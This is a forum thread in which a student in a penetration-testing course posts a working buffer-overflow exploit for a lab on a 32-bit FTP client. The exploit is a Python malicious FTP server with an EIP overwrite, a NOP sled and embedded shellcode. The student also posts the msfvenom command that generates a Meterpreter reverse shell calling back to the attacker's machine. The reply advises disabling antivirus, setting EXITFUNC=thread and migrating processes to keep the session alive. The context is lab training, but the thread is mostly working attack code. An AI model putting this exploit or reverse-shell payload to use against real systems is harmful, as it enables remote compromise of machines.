Session closed too fast

Cyber Security Penetration Testing Professional
1

Hi guys,

I’m doing the buffer overflow lab (exploit the 32bit FTP client).
I already have a shell to work but the session was terminate too fast.
Does anyone know how to get a more reliable shell for this kind of exploit?
Pls guide me.

Bellow is my FTP server script. Kali box has an ip 192.168.100.30. My victim machine has an ip 192.168.100.25

#!/usr/bin/python

import socket
import struct

total_legth = 1200
offset = 989
new_eip = struct.pack("<I", 0x770CF8F7)
all_chars = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

buf =  b""
buf += b"\xbd\xb1\x49\xc7\xf3\xd9\xc2\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x59\x31\x6a\x14\x83\xc2\x04\x03\x6a\x10\x53"
buf += b"\xbc\x3b\x1b\x1c\x3f\xc4\xdc\x42\x71\x16\x55\x67\x15"
buf += b"\x1d\x34\x57\x5d\x73\xb5\x1c\x33\x60\xca\x95\xfe\xae"
buf += b"\xe5\x26\x75\xdc\x2d\xe9\x4a\x8d\x12\x68\x37\xcc\x46"
buf += b"\x4a\x06\x1f\x9b\x8b\x4f\xe9\xd1\x64\x1d\xbd\x92\x28"
buf += b"\xb2\xca\xe7\xf0\xb3\x1c\x6c\x48\xcc\x19\xb3\x3c\x60"
buf += b"\x23\xe4\xec\xf3\x6b\x1c\x87\x5c\x4c\x1d\x44\xd9\x45"
buf += b"\x69\x56\xab\x64\x6d\x2d\x1f\x0c\x90\xe7\x51\xd2\x52"
buf += b"\xc8\x9f\x7e\x55\x11\xa7\x9e\x23\x69\xdb\x23\x34\xaa"
buf += b"\xa1\xff\xb1\x2c\x01\x8b\x62\x88\xb3\x58\xf4\x5b\xbf"
buf += b"\x15\x72\x03\xdc\xa8\x57\x38\xd8\x21\x56\xee\x68\x71"
buf += b"\x7d\x2a\x30\x21\x1c\x6b\x9c\x84\x21\x6b\x78\x78\x84"
buf += b"\xe0\x6b\x6f\xb8\x09\x74\x90\xe4\x9d\xb8\x5d\x17\x5d"
buf += b"\xd7\xd6\x64\x6f\x78\x4d\xe3\xc3\xf1\x4b\xf4\x52\x15"
buf += b"\x6c\x2a\xdc\x76\x92\xcb\x1c\x5e\x51\x9f\x4c\xc8\x70"
buf += b"\xa0\x07\x08\x7c\x75\xbd\x02\xea\xb6\xe9\x77\xf4\x5e"
buf += b"\xeb\x77\x19\xc3\x62\x91\x49\xab\x24\x0e\x2a\x1b\x84"
buf += b"\xfe\xc2\x71\x0b\x20\xf2\x79\xc6\x49\x99\x95\xbe\x22"
buf += b"\x36\x0f\x9b\xb9\xa7\xd0\x36\xc4\xe8\x5b\xb2\x38\xa6"
buf += b"\xab\xb7\x2a\xdf\xcb\x37\xb3\x20\x7e\x37\xd9\x24\x28"
buf += b"\x60\x75\x27\x0d\x46\xda\xd8\x78\xd5\x1d\x26\xfd\xef"
buf += b"\x56\x11\x6b\x4f\x01\x5e\x7b\x4f\xd1\x08\x11\x4f\xb9"
buf += b"\xec\x41\x1c\xdc\xf2\x5f\x31\x4d\x67\x60\x63\x21\x20"
buf += b"\x08\x89\x1c\x06\x97\x72\x4b\x14\xd0\x8c\x09\x33\x79"
buf += b"\xe4\xf1\x03\x79\xf4\x9b\x83\x29\x9c\x50\xab\xc6\x6c"
buf += b"\x98\x66\x8f\xe4\x13\xe7\x7d\x95\x24\x22\x23\x0b\x24"
buf += b"\xc1\xf8\xbc\x5f\xaa\xff\x3d\xa0\xa2\x9b\x3e\xa0\xca"
buf += b"\x9d\x03\x76\xf3\xeb\x42\x4a\x40\xe3\xf1\xef\xe1\x6e"
buf += b"\xf9\xbc\xf2\xba"

payload = [
    b"220 ",
    b"A" * offset,
    #b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9",
    new_eip,
    #all_chars,
    #b"C" * (total_legth - offset - len(new_eip) - len(all_chars)),
    b"\x90"*16,
    buf,
    b"\r\n"
]
payload = b"".join(payload)
s = socket()
s.bind(("0.0.0.0", 21))
s.listen(1)
print("[+] Listening on [FTP] 21")
c, addr = s.accept()

print("[+] Connection accepted from: %s" % (addr[0]))

#c.send(b"220 "+payload+ "\r\n")
c.send(payload)
c.recv(1024)
#c.close()
#print("[+] Client exploited !! quitting")
#.close()

The command that I used to generate the shellcode:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.30 LPORT=4444 -b "\x00" -f py

Here I got a session not valid and will be closed.

image
image810×337 30.7 KB

Thanks for reading.
PS: I create my own windows7_x32 box.

2

Did you turn off windows defender and any anti-virus? Also when exploiting do you get kicked out of the win7 32 bit machine you have or is the machine you are getting kicked out of one of INEs? First thing I would do is just a regular reverse shell, no meterpreter with windows. From there see if it stays up. I would also throw EXITFUNC=thread in msfvenom exploit. If the shell stays alive try to do a shell to meterpreter in Metasploit. If the meterpreter session is closed then it is most likely due to defender. You also may need to migrate quickly to another running process.